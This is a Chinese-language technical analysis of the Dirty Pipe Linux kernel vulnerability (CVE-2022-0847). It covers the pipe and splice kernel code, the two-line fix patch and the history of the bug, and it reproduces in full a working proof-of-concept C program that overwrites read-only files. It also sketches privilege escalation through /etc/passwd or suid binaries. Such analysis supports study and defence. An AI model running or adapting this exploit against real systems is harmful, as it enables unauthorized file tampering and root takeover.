CVE编号:CVE-2022-0847
受影响linux版本:5.8 ~ 5.16.11, 5.15.25 and 5.10.102.
漏洞原因:pipe管道相关的sys_splice实现中,对pipe_buffer->flags未初始化,导致原本只能被读取的page cache被写
poc效果:普通用户可以越权写任意只读文件(缺陷:不能持久化 )
漏洞分析
漏洞涉及的代码量较多,所以我们从poc着手开始分析。
poc分析
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif static void prepare_pipe (int p[2 ]) { if (pipe(p)) abort (); const unsigned pipe_size = fcntl(p[1 ], F_GETPIPE_SZ); static char buffer[4096 ]; for (unsigned r = pipe_size; r > 0 ;) { unsigned n = r > sizeof (buffer) ? sizeof (buffer) : r; write(p[1 ], buffer, n); r -= n; } for (unsigned r = pipe_size; r > 0 ;) { unsigned n = r > sizeof (buffer) ? sizeof (buffer) : r; read(p[0 ], buffer, n); r -= n; } } int main (int argc, char **argv) { if (argc != 4 ) { fprintf (stderr , "Usage: %s TARGETFILE OFFSET DATA\n" , argv[0 ]); return EXIT_FAILURE; } const char *const path = argv[1 ]; loff_t offset = strtoul(argv[2 ], NULL , 0 ); const char *const data = argv[3 ]; const size_t data_size = strlen (data); if (offset % PAGE_SIZE == 0 ) { fprintf (stderr , "Sorry, cannot start writing at a page boundary\n" ); return EXIT_FAILURE; } const loff_t next_page = (offset | (PAGE_SIZE - 1 )) + 1 ; const loff_t end_offset = offset + (loff_t )data_size; if (end_offset > next_page) { fprintf (stderr , "Sorry, cannot write across a page boundary\n" ); return EXIT_FAILURE; } const int fd = open(path, O_RDONLY); if (fd < 0 ) { perror("open failed" ); return EXIT_FAILURE; } struct stat st ; if (fstat(fd, &st)) { perror("stat failed" ); return EXIT_FAILURE; } if (offset > st.st_size) { fprintf (stderr , "Offset is not inside the file\n" ); return EXIT_FAILURE; } if (end_offset > st.st_size) { fprintf (stderr , "Sorry, cannot enlarge the file\n" ); return EXIT_FAILURE; } int p[2 ]; prepare_pipe(p); --offset; ssize_t nbytes = splice(fd, &offset, p[1 ], NULL , 1 , 0 ); if (nbytes < 0 ) { perror("splice failed" ); return EXIT_FAILURE; } if (nbytes == 0 ) { fprintf (stderr , "short splice\n" ); return EXIT_FAILURE; } nbytes = write(p[1 ], data, data_size); if (nbytes < 0 ) { perror("write failed" ); return EXIT_FAILURE; } if ((size_t )nbytes < data_size) { fprintf (stderr , "short write\n" ); return EXIT_FAILURE; } printf ("It worked!\n" ); return EXIT_SUCCESS; }
poc对应到内核处理过程中,三个重点如下:
第一次写pipe时,对应的内核代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 static ssize_t pipe_write (struct kiocb *iocb, struct iov_iter *from) { buf = &pipe->bufs[head & mask]; buf->page = page; buf->ops = &anon_pipe_buf_ops; buf->offset = 0 ; buf->len = 0 ; if (is_packetized(filp)) buf->flags = PIPE_BUF_FLAG_PACKET; else buf->flags = PIPE_BUF_FLAG_CAN_MERGE; pipe->tmp_page = NULL ; }
调用splice时,调用路径比较长,但最终会进入下面这个函数:
1 2 3 4 5 6 7 8 9 10 11 12 static size_t copy_page_to_iter_pipe (struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { buf = &pipe->bufs[i_head & p_mask]; buf->ops = &page_cache_pipe_buf_ops; get_page(page); buf->page = page; buf->offset = offset; buf->len = bytes; }
第二次写pipe时,会使用上一步的page cache
1 2 3 4 5 6 7 8 9 10 11 12 static ssize_t pipe_write (struct kiocb *iocb, struct iov_iter *from) { if (chars && !was_empty) { if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) { ret = copy_page_from_iter(buf->page, offset, chars, from); } }
需要注意的是,由于第二步splice时,参数len(对应bytes)至少为1,所以利用漏洞写的时候,开始的那1个字节是无法覆盖的。
管道相关操作的详细内核代码流程,可以参考下一小节的分析。
内核代码分析
抽象层面,我们认为管道就是一个buffer,一端(fd[0])读,另一端(fd[1])写。
对应到内核代码实现,管道实际是由1~16个page组成的,每个page通过struct pipe_buffer
管理,而16个struct pipe_buffer
又通过一个struct pipe_inode_info
进行管理。抽象出如下图所示的结构,管道的数据实际存放在最下层的物理页面中。
看代码时明白了一些点,怕之后忘记需要重看代码(费时间),所以记录一下。当往管道中写入数据时:
如果创建pipe时flags中没有O_DIRECT,pipe_buffer->flags就会被赋值为PIPE_BUF_FLAG_CAN_MERGE。那么前后多次写入pipe的数据,内核在处理时可以将它们合并到1个page中存储(要求这些数据总长度<= 1 PAGESIZE)
如果创建pipe时flags中有O_DIRECT,那么一次写入的数据,必须自己占一个page(不管是否写满),不跟前后写入的数据合并
在读的时候也一样,不带O_DIRECT标志的,page内容全部读完了才释放空间。带O_DIRECT标志的,不管这次读走了多少,都要释放空间
调用write往pipe写的时候,一次最多只能写一个PAGESIZE,即4096字节
一个pipe管道最多能写16*4096=65535字节数(默认,可通过 fcntl()
设置),再写就会阻塞,直到有人读出
创建pipe
创建pipe,即建立管道,涉及两个主要结构体创建(空间分配):struct pipe_inode_info
和struct pipe_buffer
。
1 2 3 4 5 6 7 8 9 10 11 12 13 #define PIPE_DEF_BUFFERS 16 struct pipe_inode_info *alloc_pipe_info (void ) { unsigned long pipe_bufs = PIPE_DEF_BUFFERS; pipe = kzalloc(sizeof (struct pipe_inode_info), GFP_KERNEL_ACCOUNT); pipe->bufs = kcalloc(pipe_bufs, sizeof (struct pipe_buffer), GFP_KERNEL_ACCOUNT); }
struct pipe_inode_info
结构体(linux5.15版本)中各成员的含义如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 struct pipe_inode_info { struct mutex mutex ; wait_queue_head_t rd_wait, wr_wait; unsigned int head; unsigned int tail; unsigned int max_usage; unsigned int ring_size; #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif unsigned int nr_accounted; unsigned int readers; unsigned int writers; unsigned int files; unsigned int r_counter; unsigned int w_counter; unsigned int poll_usage; struct page *tmp_page ; struct fasync_struct *fasync_readers ; struct fasync_struct *fasync_writers ; struct pipe_buffer *bufs ; struct user_struct *user ; #ifdef CONFIG_WATCH_QUEUE struct watch_queue *watch_queue ; #endif };
struct pipe_buffer
结构体(linux5.15版本)中各成员的含义如下:
1 2 3 4 5 6 7 struct pipe_buffer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private ; };
写pipe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from) { struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; size_t total_len = iov_iter_count(from); ssize_t chars; head = pipe->head; was_empty = pipe_empty(head, pipe->tail); chars = total_len & (PAGE_SIZE-1 ); if (chars && !was_empty) { unsigned int mask = pipe->ring_size - 1 ; struct pipe_buffer *buf = &pipe->bufs[(head - 1 ) & mask]; int offset = buf->offset + buf->len; if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) { ret = copy_page_from_iter(buf->page, offset, chars, from); buf->len += ret; if (!iov_iter_count(from)) goto out; } } for (;;) { head = pipe->head; if (!pipe_full(head, pipe->tail, pipe->max_usage)) { unsigned int mask = pipe->ring_size - 1 ; struct pipe_buffer *buf = &pipe->bufs[head & mask]; struct page *page = pipe->tmp_page; int copied; if (!page) { page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); } pipe->head = head + 1 ; buf = &pipe->bufs[head & mask]; buf->page = page; buf->ops = &anon_pipe_buf_ops; buf->offset = 0 ; buf->len = 0 ; if (is_packetized(filp)) buf->flags = PIPE_BUF_FLAG_PACKET; else buf->flags = PIPE_BUF_FLAG_CAN_MERGE; pipe->tmp_page = NULL ; copied = copy_page_from_iter(page, 0 , PAGE_SIZE, from); ret += copied; buf->offset = 0 ; buf->len = copied; if (!iov_iter_count(from)) break ; } } out: if (pipe_full(pipe->head, pipe->tail, pipe->max_usage)) wake_next_writer = false ; if (was_empty || pipe->poll_usage) wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); if (wake_next_writer) wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); return ret; }
读pipe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to) { size_t total_len = iov_iter_count(to); struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage); for (;;) { unsigned int head = pipe->head; unsigned int tail = pipe->tail; unsigned int mask = pipe->ring_size - 1 ; if (!pipe_empty(head, tail)) { struct pipe_buffer *buf = &pipe->bufs[tail & mask]; size_t chars = buf->len; if (chars > total_len) { chars = total_len; } written = copy_page_to_iter(buf->page, buf->offset, chars, to); ret += chars; buf->offset += chars; buf->len -= chars; if (!buf->len) { pipe_buf_release(pipe, buf); tail++; pipe->tail = tail; } total_len -= chars; if (!total_len) break ; if (!pipe_empty(head, tail)) continue ; } } if (pipe_empty(pipe->head, pipe->tail)) wake_next_reader = false ; __pipe_unlock(pipe); if (was_full) wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); if (wake_next_reader) wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); return ret; }
另外,pipe_buf_release()
的时候有一个优化,当pipe_buffer使用的page只有一个引用,且pipe_inode_info->tmp_page
为空时,会将这个page给tmp_page。这样需要下一个写请求的时候,若空间不够就无需再申请page。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 static inline void pipe_buf_release (struct pipe_inode_info *pipe, struct pipe_buffer *buf) { const struct pipe_buf_operations *ops = buf->ops; buf->ops = NULL ; ops->release(pipe, buf); } static void anon_pipe_buf_release (struct pipe_inode_info *pipe, struct pipe_buffer *buf) { struct page *page = buf->page; if (page_count(page) == 1 && !pipe->tmp_page) pipe->tmp_page = page; else put_page(page); }
splice操作
splice在内核中的函数调用路径如下:
1 2 3 4 5 SYSCALL_DEFINE6(splice, int , fd_in, loff_t __user *, off_in, int , fd_out, loff_t __user *, off_out, size_t , len, unsigned int , flags); __do_splice(in.file, off_in, out.file, off_out, len, flags); do_splice(in, __off_in, out, __off_out, len, flags);
do_splice()
中分三种情况
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 long do_splice (struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int flags) { ipipe = get_pipe_info(in, true ); opipe = get_pipe_info(out, true ); if (ipipe && opipe) { return splice_pipe_to_pipe(ipipe, opipe, len, flags); } if (ipipe) { ret = do_splice_from(ipipe, out, &offset, len, flags); if (!off_out) out->f_pos = offset; else *off_out = offset; return ret; } if (opipe) { if (off_in) { if (!(in->f_mode & FMODE_PREAD)) return -EINVAL; offset = *off_in; } else { offset = in->f_pos; } ret = splice_file_to_pipe(in, opipe, &offset, len, flags); if (!off_in) in->f_pos = offset; else *off_in = offset; return ret; }
这里我们只需关注最后一种out是pipe类型的情况,即splice_file_to_pipe()
的调用路径
1 2 3 4 5 splice_file_to_pipe(in, opipe, &offset, len, flags); do_splice_to(in, offset, opipe, len, flags); in->f_op->splice_read(in, ppos, pipe, len, flags);
vscode+gdb调试结果显示,in->f_op->splice_read对应到generic_file_splice_read()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ssize_t generic_file_splice_read (struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { iov_iter_pipe(&to, READ, pipe, len); init_sync_kiocb(&kiocb, in); kiocb.ki_pos = *ppos; ret = call_read_iter(in, &kiocb, &to); return ret; } static inline ssize_t call_read_iter (struct file *file, struct kiocb *kio, struct iov_iter *iter) { return file->f_op->read_iter(kio, iter); }
file->f_op->read_iter对应到generic_file_read_iter()
1 2 3 4 5 6 ssize_t generic_file_read_iter (struct kiocb *iocb, struct iov_iter *iter) { return filemap_read(iocb, iter, retval); }
然后
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 ssize_t filemap_read (struct kiocb *iocb, struct iov_iter *iter, ssize_t already_read) { struct file *filp = iocb->ki_filp; struct file_ra_state *ra = &filp->f_ra; struct address_space *mapping = filp->f_mapping; struct inode *inode = mapping->host; iov_iter_truncate(iter, inode->i_sb->s_maxbytes); pagevec_init(&pvec); do { error = filemap_get_pages(iocb, iter, &pvec); isize = i_size_read(inode); end_offset = min_t (loff_t , isize, iocb->ki_pos + iter->count); for (i = 0 ; i < pagevec_count(&pvec); i++) { struct page *page = pvec.pages[i]; size_t page_size = thp_size(page); size_t offset = iocb->ki_pos & (page_size - 1 ); size_t bytes = min_t (loff_t , end_offset - iocb->ki_pos, page_size - offset); copied = copy_page_to_iter(page, offset, bytes, iter); already_read += copied; iocb->ki_pos += copied; } } while (iov_iter_count(iter) && iocb->ki_pos < isize && !error); return already_read ? already_read : error; }
再分别看一下filemap_get_pages()
和copy_page_to_iter()
函数:
首先是filemap_get_pages()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 static int filemap_get_pages (struct kiocb *iocb, struct iov_iter *iter, struct pagevec *pvec) { struct file *filp = iocb->ki_filp; struct address_space *mapping = filp->f_mapping; pgoff_t index = iocb->ki_pos >> PAGE_SHIFT; last_index = DIV_ROUND_UP(iocb->ki_pos + iter->count, PAGE_SIZE); retry: filemap_get_read_batch(mapping, index, last_index, pvec); if (!pagevec_count(pvec)) { page_cache_sync_readahead(mapping, ra, filp, index, last_index - index); filemap_get_read_batch(mapping, index, last_index, pvec); } if (!pagevec_count(pvec)) { err = filemap_create_page(filp, mapping, iocb->ki_pos >> PAGE_SHIFT, pvec); if (err == AOP_TRUNCATED_PAGE) goto retry; return err; } return err; }
然后是copy_page_to_iter()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 copy_page_to_iter(page, offset, bytes, iter); __copy_page_to_iter(page, offset, min(bytes, (size_t )PAGE_SIZE - offset), i); static size_t __copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { if (iov_iter_is_pipe(i)) return copy_page_to_iter_pipe(page, offset, bytes, i); return 0 ; } static size_t copy_page_to_iter_pipe (struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { struct pipe_inode_info *pipe = i->pipe; struct pipe_buffer *buf ; unsigned int p_tail = pipe->tail; unsigned int p_mask = pipe->ring_size - 1 ; unsigned int i_head = i->head; size_t off; if (unlikely(bytes > i->count)) bytes = i->count; if (unlikely(!bytes)) return 0 ; buf->ops = &page_cache_pipe_buf_ops; get_page(page); buf->page = page; buf->offset = offset; buf->len = bytes; i->count -= bytes; return bytes; }
简单来说,就是splice直接把page cache给到了pipe_buffer->page
,省去了用户态访问文件时需要来回拷贝的麻烦,提升了效率。如下图所示:
正常情况下,没有PIPE_BUF_FLAG_CAN_MERGE标记的话,这个pipe_buffer指向的page是只会被读取的,无法进行写入操作。
但是,由于copy_page_to_iter_pipe()
函数中,忘记对buf->flags
做初始化,默认以为它是0,导致了漏洞的发生。
漏洞修复
patch: lib/iov_iter: initialize “flags” in new pipe_buffer
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 lib/iov_iter.c | 2 ++ 1 file changed, 2 insertions(+) @@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by return 0; buf->ops = &page_cache_pipe_buf_ops; + buf->flags = 0; get_page(page); buf->page = page; buf->offset = offset; @@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size, break; buf->ops = &default_pipe_buf_ops; + buf->flags = 0; buf->page = page; buf->offset = 0; buf->len = min_t(ssize_t, left, PAGE_SIZE); --
除了poc涉及的copy_page_to_iter_pipe()
函数,漏洞补丁还在push_pipe()
中对pipe_buffer->flags做了初始化操作。
(跟dirtycow一样简单的两行patch,跟dirtycow一样可以写任意只读文件,这两个洞实在是太强了)
漏洞利用
poc验证
poc验证较简单,利用qemu搭建linux5.15的环境,很快就出结果了(这点比dirtycow好用,不需要竞争,可惜能用dirtypipe打的版本不多)。
两个小瑕疵:
第一个字节无法覆盖。
无法持久化。重启后文件恢复未被更改的状态,除非有其他有权限进程改了该文件,让其变为dirty,我们利用dirtypipe的更改才会被写回到磁盘中,否则只能改pagecache中的内容。不过以基于此也足够提权利用了。
提权利用
在x86 linux上进一步的提权利用跟dirtycow类似,找一些特殊文件如/etc/passwd,或带suid位的可执行程序,或者公用的库函数之类的,利用dirtypipe将文件内容改掉达到提权目的。
poc已经把主体框架搭完了,剩下的工作感觉有点重复,这里就先略过。后面有需要再补上。
知识点
pipe
管道是一个单向的数据通道,用于进程间通信。
linux系统上,用于创建管道的系统调用有两个:pipe和pipe2,它们的区别仅在于pipe2多了一个flags参数(当flags为0时,pipe2和pipe等价)。对应libc封装函数的定义如下:
1 2 3 4 5 6 #include <unistd.h> int pipe (int pipefd[2 ]) ;#include <fcntl.h> /* Definition of O_* constants */ #include <unistd.h> int pipe2 (int pipefd[2 ], int flags) ;
返回的数组pipefd[2]
表示管道的两端,pipefd[0]
是读端,pipefd[1]
是写端,写入的数据会在内核中缓存。
splice
splice是零拷贝在管道(pipe)上的一种实现,它针对两个文件描述符进行数据搬运操作,无需将数据从内核态拷贝到用户态,而后再拷贝回内核。它在libc中的封装函数定义如下:
1 2 3 4 #define _GNU_SOURCE #include <fcntl.h> ssize_t splice (int fd_in, off64_t *off_in, int fd_out, off64_t *off_out, size_t len, unsigned int flags) ;
表示从fd_in
(偏移*off_in
的位置)移动len
字节数据到fd_out
,有个条件是fd_in
和fd_out
至少有一个是pipe建立的文件描述符(对应的off_in和off_out必须设置成NULL)。所以这里有三种情况,in和out都是pipe,in是pipe而out不是,in不是而out是pipe,三者在代码中的处理过程是不一样的。
背后的故事
漏洞发现
作者Max Kellermann在他的博客 中详细记录了这个漏洞的发现过程。
2021年4月份作者第一次收到文件损毁的工单(貌似他并不是专业安全研究员),大半年的时间里一步一坑从应用层逐渐探索到内核层,终于在2022年2月确认问题根因是一个linux内核漏洞。
文章的字里行间透露出过程中的困惑和不可思议,着实佩服作者探索本质的勇气和坚持。
这种类型的漏洞不好发现,不像多数内存洞会有很直观的反应(崩溃/死机/重启),它的影响仅仅是改变了磁盘文件的某些字节,即使发生了也很难察觉。但这种漏洞却很好用,无需一步步在内核中构造ROP、绕过各种安全措施再回到用户态获得root shell,它直接在应用层面改一些特殊文件即可达到提权目的(从容又稳定)。
代码历史
参考 Linux 内核提权 DirtyPipe(CVE-2022-0847)漏洞分析
splice系统调用代码演进历程:
linux 2.6 :引入splice系统调用
patch: Introduce sys_splice() system call
linux 4.9 :添加iov_iter对pipe的支持
patch: new iov_iter flavour: pipe-backed
从这个版本开始,出现了copy_page_to_iter_pipe()
和push_pipe()
,而这两个函数中缺少对pipe_buffer->flags
的初始化操作。不过此时flags还没有merge属性,因此无影响。
linux 5.1 :删除pipe_buffer_operations中的can_merge成员
patch: pipe: stop using ->can_merge
pipe_write()
中使用pipe_buf_can_merge()
函数检查区分不同的pipe_buffer,只允许注册了anon_pipe_buf_ops
的pipe_buffer通过检查
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from) { if (pipe_buf_can_merge(buf) && offset + chars <= PAGE_SIZE) { ret = pipe_buf_confirm(pipe, buf); if (ret) goto out; ret = copy_page_from_iter(buf->page, offset, chars, from); } static bool pipe_buf_can_merge (struct pipe_buffer *buf) { return buf->ops == &anon_pipe_buf_ops; }
linux 5.8 :合并各种类型pipe_buffer_operations,新增PIPE_BUF_FLAG_CAN_MERGE
属性
patch: pipe: merge anon_pipe_buf*_ops
此版本合并了各种类型的pipe_buffer_operations(因为都一样,没必要重复定义),对pipe_buffer中flags成员,新增PIPE_BUF_FLAG_CAN_MERGE
属性。
由于自linux 4.9以来,flags在copy_page_to_iter_pipe()
和push_pipe()
中未初始化,所以新增的这个属性就导致了漏洞的发生。
参考文章
The Dirty Pipe Vulnerability
DirtyPipe(CVE-2022-0847)漏洞分析
终端安全 | DirtyPipe(CVE-2022-0847)漏洞分析
Linux 的进程间通信:管道
看一遍就理解:零拷贝详解
linux网络编程九:splice函数,高效的零拷贝
LINUX系统调用SENDFILE和SPLICE简单分析
图解 | Linux进程通信 - 管道实现
O_DIRECT - Linux 直接I/O 原理与实现
IO - filemap - 1 Bufferd IO